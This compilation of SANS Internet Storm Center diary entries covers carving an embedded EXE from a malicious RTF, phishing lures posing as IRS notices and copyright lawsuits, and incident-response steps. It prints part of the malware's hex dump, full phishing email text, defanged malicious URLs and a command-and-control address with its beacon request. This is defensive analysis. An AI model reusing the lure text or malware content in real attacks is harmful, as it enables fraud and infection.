The Glider

Since we got some mails from readers who had trouble getting the malware extraction technique described in http://isc.sans.org/diary.html?storyid=6703 to work onyesterday's malicious copyright lawsuit sample , here's a quick walk-through again on how to carve an EXE out of a DOC or RTF file.}viewkind4uc1pardlang1033f0fs20{objectobjemb{*objclass Package}objw795objh765{*objdata

01050000

02000000

08000000

5061636b61676500

00000000

00000000

6f740000

0200646f63732e70646600433a5c446f63756d656e747320616e642053657474696e67735c4164
OK .. looks indeed like an RTF with an embedded object. The pile of numbers are all ASCII codes in Hex, but before we can convert them to readable characters, we first have to strip away the initial two lines, because their presence would confuse the Perl statement that follows later.
$ cat suit_documents.doc | sed '1,2d' suit1.temp

$ head suit1.temp

01050000

02000000

08000000

5061636b61676500

00000000

00000000

6f740000

0200646f63732e70646600433a5c446f63756d656e747320616e642053657474696e67735c4164



Now, we are ready for the transformation from Hex ASCII codes to printable characters:
$ cat suit1.temp | perl -ne 's/(..)/print(chr(hex($1)))/ge' suit2.temp
So far, the old method still seems to work: We locate objdata in the RTF document, strip out everything in front, thenfeed the blob into Perl to convert the hexadecimal codes to actual ASCII characters. I changed the Perl command slightly compared to the earlier diary on the subject, because one of the problems that people seem to have is related tohow end of line is treated on Windows vs Unix. The earlier version
$cat detail.rtf | sed -e '1,3d' | perl -ne 's/(..)/print chr(hex($1))/ge' detail.bin
kept any DOS line terminators unchanged, which doesn't bode well for the resulting executable.The new version
$ cat suit1.temp | perl -ne 's/(..)/print(chr(hex($1)))/ge' suit2.temp
is now really only printing out converted hex codes, and is dropping all the CR/LF line terminators that are present in the original file after every line.The resulting file is still in Object Package format, but if you look closely, youcan see the tell-tale MZ that marks the start of an executable:

What makes this case a bit more convoluted than last year's example is that the badguys tried real hard to disguise the contents. This time, the initial file had a .DOC extension,but was in fact an .RTF format, which contained an embedded COMPLA~1.EXE that had aharmless looking Icon (3.ico) and was displayed to the user as docs.pdf. Yup,pretty sneaky. You can see all these file names in the hex output above.
Now, how to get the EXE out. According to the mentioned earlier diary, the numbers betweenthe EXE filename and the MZ header mark the size of the executable that we need to cutout. In this case, we have 00 10 74 00 00 in that position:
00000070 4c 41 7e 31 2e 45 58 45 00 10 74 00 00 4d 5a 90 |LA~1.EXE..t..MZ.|
What my earlier example didn't make clear is that these numbers have to be readright to left to determine the size. In the current case, the size is 007410hex,which converts to 29712 bytes.
Let's carve it out. We need to skip to position 0x7D (=125) at the beginning of the fileto get to the MZ marker, and from there, the EXE should be 29712 bytes long.
$ dd if=suit2.temp of=suit2.exe skip=125 count=29712 bs=1

29712+0 records in

29712+0 records out

29712 bytes (30 kB) copied, 0.15203 s, 195 kB/s
$ md5sum suit2.exe

ead062fb0aca0e3d0e8c12c4cf095765 suit2.exe
Voil! Now, we can use this hash on http://www.virustotal.com/buscaHash.html to see if someone elsehas analyzed this file before :)

(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

I've received reports of suspicious emails claiming to be from the IRS. It's a common scheme to get a user to click and run an executable.
It looks like zeus/zbot to me (more on that here: https://zeustracker.abuse.ch/faq.php their cert is a little non-standard,) but Ican't share the details yet. If you've received one of these emails and don't mind sharing the details with our readers, please submit a copy (via: http://isc.sans.org/contact.html)
The email looks something like (thanks for sharing Michael!):


Subject: Underreported Income Notice
Taxpayer ID: recipient-00000198499136US
Tax Type: INCOME TAX

Issue: Unreported/Underreported Income (Fraud Application)

Please review your tax statement on Internal Revenue Service (IRS) website (click on the link below):

Internal Revenue Service

hxxp://www.irs.gov.assewyx.co.uk/fraud.applications/application/statement.php?

The download in this particular link was tax-statement.exe.
If you want to check out your own logs to catch this and similar attacks, I'd suggest looking for domains that look like www.irs.gov.stuff and downloaded executables with the word tax in them.
For those with enough free-time to try to track the different groups using zeus, this one has an Avalanche feel to it. (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

The Scenario:
Let's say you're responsible for responding to an email like that reported here: https://isc.sans.org/diary.html?storyid=8497
Assess:
Is this email a problem?
It certainly appears to be appealing to the recipients fears with the scary legal language. There's a typo or two in there that might make you suspicious. Real or not, a document like this should be brought to the attention of your security/legal departments. So it's likely a problem of one sort or another.
What is it?
You could start by checking into the source of the email and the domain hosting the link. In this case, the originator appears to be a mail-server for a small city. The domain has been around for nearly a year, but was just updated a few days ago. Domaintools.com is your friend.
If you're equipped for it, you may ant to start by checking out the document by pulling down to a safe machine. In my case it's a unix box since it appears to be a word document. I craft a simple wget script to pull the file down looking like a vulnerable version of IE.

wget --save-cookies=./cookies -U .NET CLR 1.1.4322) $1

Curiosity getting the better of me, I}viewkind4uc1pardlang1033f0fs20{objectobjemb{*objclass Package}objw795objh765{*objdata

01050000

02000000

08000000

5061636b61676500

00000000

00000000

6f740000

0200646f63732e70646600433a5c446f63756d656e747320616e642053657474696e67735c4164

6d696e6973747261746f725c4465736b746f705c332e69636f000000030010000000433a5c434f

4d504c417e312e45584500107400004d5a90000300000004000000ffff0000b800000000000000

400000000000000000000000000000000000000000000000000000000000000000000000d00000

000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072

756e20696e20444f53206d6f64652e0d0d0a240000000000000009d117d84db0798b4db0798b4d

b0798b4db0788b51b0798b2faf6a8b48b0798b4b93728b49b0798b8ab67f8b4cb0798bb2907d8b

4cb0798b526963684db0798b00000000000000000000000000000000504500004c0104000fd8a9

4b0000000000000000e0000f010b010600001e00000052000000000000c02a0000001000000030

00000000400000100000000200000400000000000000040000000000000000a000000004000000

000000020000000000100000100000000010000010000000000000100000003033000052000000

...

Yeah, that doesn't look good. Let's calculate an md5sum and see what others think of it.

$ md5sum suit_documents.doc

6db76304a2aff6bef94364b86abd8b7f suit_documents.doc

Since you're a lone responder and don't have an army of reverse engineers on your staff, we'll leverage this information to see what the group-mind knows about this.
I use the hash-search at virus total to see if someone's already working on this: http://www.virustotal.com/buscaHash.html
In this case, this yields the following results: http://www.virustotal.com/analisis/9b762ff9d2103022bf1476f2c55db91475f31526522716e827875801f92a0d87-1269529133
Some interesting things come back, we know that this is likely some sort of downloader disguised as a document.
I'll also search through http://www.threatexpert.com/ by the md5sum to see if it has already been analyzed. In this case it hasn't. Icould ship it off there for analysis or one of the other fine sandbox tools such as Anubis (http://anubis.iseclab.org) or CWSandbox (http://mwanalysis.org/)
Looking at the earlier diary entry we see results from Anubis showing some network activity. Now we have a couple of things to look for to measure impact:

Email details to search our mail-logs to determine who received the lure message.
The URL of the initial downloader to see who clicked on it and brought it into the network.
The network behavior of a system that executed the code.

How bad is it for us?
Using those details it's time to evaluate the impact this attack has had on your firm. If you have anyone who downloaded the file, or evidence of a machine reaching out for the next-stage then you pull your Malware Incident response document off of the shelf and follow that. We all have differing levels of documentation to refer to, but there's always some sort of plan, even if it's update resume.
Protect
While you're assess the impact (greps take a while to run sometimes) you have some information that you can leverage to protect the people in your network. You have email addresses and URLs to block and malware to submit to your vendor (assuming they're not on the virustotal list like mine wasn't.) Acting quickly on this protection phase makes your clean-up phase go easier.
Respond/Clean-up
Now that you have your list of machines that were exposed and your Malware incident response document handy, you follow that to make your systems and network all shiny and clean.
Report
This step is important.
In my environment, my boss likes to know what it is that I'm doing in the dark data closet. So keeping track of the event, it's impact, etc. is good for not only tracking the incident, but also review time.
When you were researching the IP that sent the email and hosting the URL (you still have that up in a browser, right?) it is also critical that you report that to the abuse contacts. Send a kind email reporting the issue, (because they'll likely get a few reports, and most of them might not be so kind.) which helps more than just your own environment.
Learning from Others/Helping Others
You will want to follow a similar process in response to events reported here and in other blogs and media. It not only helps protect you from what is hitting other folks, but you may also uncover a gap in your internal detection process.
By submitting malicious URLs to proxy-filter vendors, and malware to AVvendors you help protect not only your environment, but also your neighbors. If fewer of your neighbors are getting infected, then that's fewer spam-bots, and phishing-sites the eventually target you. (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

Overview
An email is being sent out warning the recipient of a Copyright Lawsuit filed against you. We received a copy here and a number of .EDUs have reported it's receipt. It looks something similar to:

March 24, 2010

Crosby Higgins

350 Broadway, Suite 300

New York, NY 10013



To Whom It May Concern:



On the link bellow is a copy of the lawsuit that we filed against you in court on March 11, 2010.

Currently the Pretrail Conference is scheduled for April 11th, 2010 at 10:30 A.M. in courtroom #36.

The case number is 3485934. The reason the lawsuit was filed was due to a completely inadequate response from your company for copyright infrigement that our client Touchstone Advisories Inc is a victim of Copyright infrigement

hXXp://www.touchstoneadvisorsonline.com/lawsuit/suit_documents.doc

Touchstone Advisories Inc has proof of multiple Copyright Law violations that they wish to present in court on April 11th, 2010.



Sincerely,



Mark R. Crosby

Crosby Higgins LLP

The law-firms named in the email, header, and sending server all appear to be a mish-mash of existing firms.
If a user clicks on the link and opens the document it will attempt to download additional payload.
Initial Detection
Currently only a few AVsolutions detect the initial document: http://www.virustotal.com/analisis/9b762ff9d2103022bf1476f2c55db91475f31526522716e827875801f92a0d87-1269486837
Behavioral Notes
Following Daniel's process (http://isc.sans.org/diary.html?storyid=6703) one could extract the executable and determine what it's up to.
It appears to reach out to 121.14.149.132:80 to make a request similar to:
GET /fwq/indux.php?U=1234@1014@1@0@0@c791d4a4a147b2cd1843fe4f7f27f3a1df63f95daf0c3ddcd5f1b1e4538fd803


(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

Reader Dave alerted us to some weirdness with Wikipedia earlier today. I personally had some weirdness with the site, but it had cleared up relatively quickly. Turns out that they had some overheating problems in datacenter and DNS re-routing took longer than expected: http://techblog.wikimedia.org/2010/03/global-outage-cooling-failure-and-dns/ (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

Cisco released 7 new security updates to various different products today. More information at their site: http://ww.cisco.com/en/US/products/products_security_advisories_listing.html
-Kyle Haugsness (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

Slow news/incidents day.... So I will post something slightly off-topic. Yes, the story was on Slashdot and it may never come to fruition (or even be suitably priced), but the news that Commodore USA was releasing a new PC embedded into a keyboard had me reminiscing of my first computer, the commodore64. New site here:http://www.commodoreusa.net
I can't tell you how many times Iread syntax error in response to my prodding of the BASIClanguage. Hmm, how do I make this into a security-related article? It would be difficult to install a keyboard logger on these things!! So perhaps it fits into your physical security strategy? Does anyone conquer physical security threats with creative choices of hardware? For instance, if you have a policy of no USB flash drives do you enforce that through hardware restrictions?
-Kyle Haugsness (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

Our read Paul observed malware being delivered from the .sys directory of various web sites. The URLfollows the scheme:
http://evilexample.com/.sys/?action=....
In response to clicking on the link, the user is asked to install the software. According to Paul, he observed the link being delivered via Facebook which of course makes the message more plausible and it is likely that users install the software thinking it came from a Friend. Before adding a specific block for .sys, Paul's web filter caught about 60% of these exploits.
Once a user follows the link, additional exe files are downloaded from .sys directories. The file names Paul observed are p.exe, go.exe and v2captcha21.exe.


------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.